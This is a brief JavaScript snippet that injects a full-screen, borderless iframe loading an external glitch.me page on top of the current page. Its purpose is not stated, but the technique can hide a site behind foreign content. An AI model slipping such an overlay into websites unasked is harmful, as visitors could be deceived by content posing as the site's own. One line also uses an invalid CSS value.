document.body.style.overflow = "none";
var x = document.createElement("iframe");
x.src = "https://hore-buttered-reply.glitch.me";
x.style.border = "0";
x.style.left = "0";
x.style.top = "0";
x.style.width = "100%";
x.style.height = "100%";
x.style.zIndex = "10000";
x.style.position = "absolute";
document.body.appendChild(x);
